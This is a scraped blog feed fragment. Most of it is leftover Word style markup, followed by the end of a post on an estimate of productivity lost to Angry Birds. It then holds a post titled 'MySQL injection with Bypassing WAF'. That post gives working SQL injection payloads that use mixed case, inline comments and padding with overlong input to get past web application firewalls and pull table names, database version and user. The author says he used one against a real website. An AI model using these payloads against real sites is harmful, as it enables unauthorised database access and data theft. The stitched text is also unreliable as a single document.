List Accent 1"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"> <w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"> <w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"> <w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"> <w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"> <w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"> <w:lsdexception locked="false" priority="37" name="Bibliography"> <w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0in; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} </style> <![endif]--> </p><p class="MsoNormal" style="line-height: normal;"><span style=";font-family:";font-size:12pt;" ></span></p>Madrigal looked at the methodology used to calculate things like how much money companies lose when productivity slows thanks to the NCAA tournament, or how much money is lost thanks to our obsession with fantasy football.<br /><br />From there he came up with his estimate, which is laid out in the graphic below. He admits the math could be a little fuzzy, but says, "I bet this estimate is right to the order of magnitude, if not in the details."<br /><br />Frankly, we think these sorts of things are bogus. Productivity isn't lost. People just do what they do. But, it's sort of fun to play with numbers.<br /><br /><a href="http://static7.businessinsider.com/image/4e709d0a6bb3f7eb79000033/angry-birds.jpg"><img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 620px; height: 436px;" src="http://static7.businessinsider.com/image/4e709d0a6bb3f7eb79000033/angry-birds.jpg" alt="" border="0" /></a><br /><br /><br /><p class="MsoNormal" style="line-height: normal;"><span style=";font-family:";font-size:12pt;" ></span></p> <p class="MsoNormal" style="line-height: normal;"><span style=";font-family:";font-size:12pt;" ></span></p>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-42727800267395923972011-09-12T23:05:00.000-07:002011-10-25T01:21:43.390-07:00<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="line-height: normal;">
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;">MySQL injection with Bypassing WAF:</span></u></i></b><br />
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;"><br /></span></u></i></b><br />
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;">Comments:</span></u></i></b></div>
<div class="MsoNormal" style="line-height: normal;">
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;"><br /></span></u></i></b><b><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;"></span></b></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">SQL
comments are a blessing to us SQL injectors. They allow us to bypass a lot of
the restrictions of Web application firewalls and to kill certain SQL
statements to execute the attackers commands while commenting out the actual
legitimate query. Some comments in SQL:</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">//, — ,
/**/, #, –+, — -, ;</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;">Case
Changing:</span></u></i></b><b><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;"></span></b></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;"> Some WAF’s filter key words like /union\select/ig We can bypass this
filter by using inline comments most of the time, More complex examples will
require more advanced approach like adding SQL keywords that will further
separate the two words:</span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">id=1/*!UnIoN*/SeLeCT</span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Take
notice of the exclamation point /*!code*/ The exclamation point executes our
SQL statement.</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"><br />
Inline comments can be used throughout
the SQL statement so if table_name or information_schema are filtered we can
add more inline comments. For example:</span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">id=1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM
/*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/=database()– -</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">This
bypass above works. I myself just used this against a Web site recently. </span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;">Buffer
Overflow:/Unexpected input:</span></u></i></b><b><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;"></span></b></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">A lot of
WAFS are written in the C language making them prone to overflow or or act
differently when loaded with a bunch of data. Here is a WAF that does it’s job
correctly, but when given a large amount of Data allows the malicious request
and response.</span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">id=1 and
(select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more
A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26<br />
,27,28,29,30,31,32,33,34,35,36–+</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0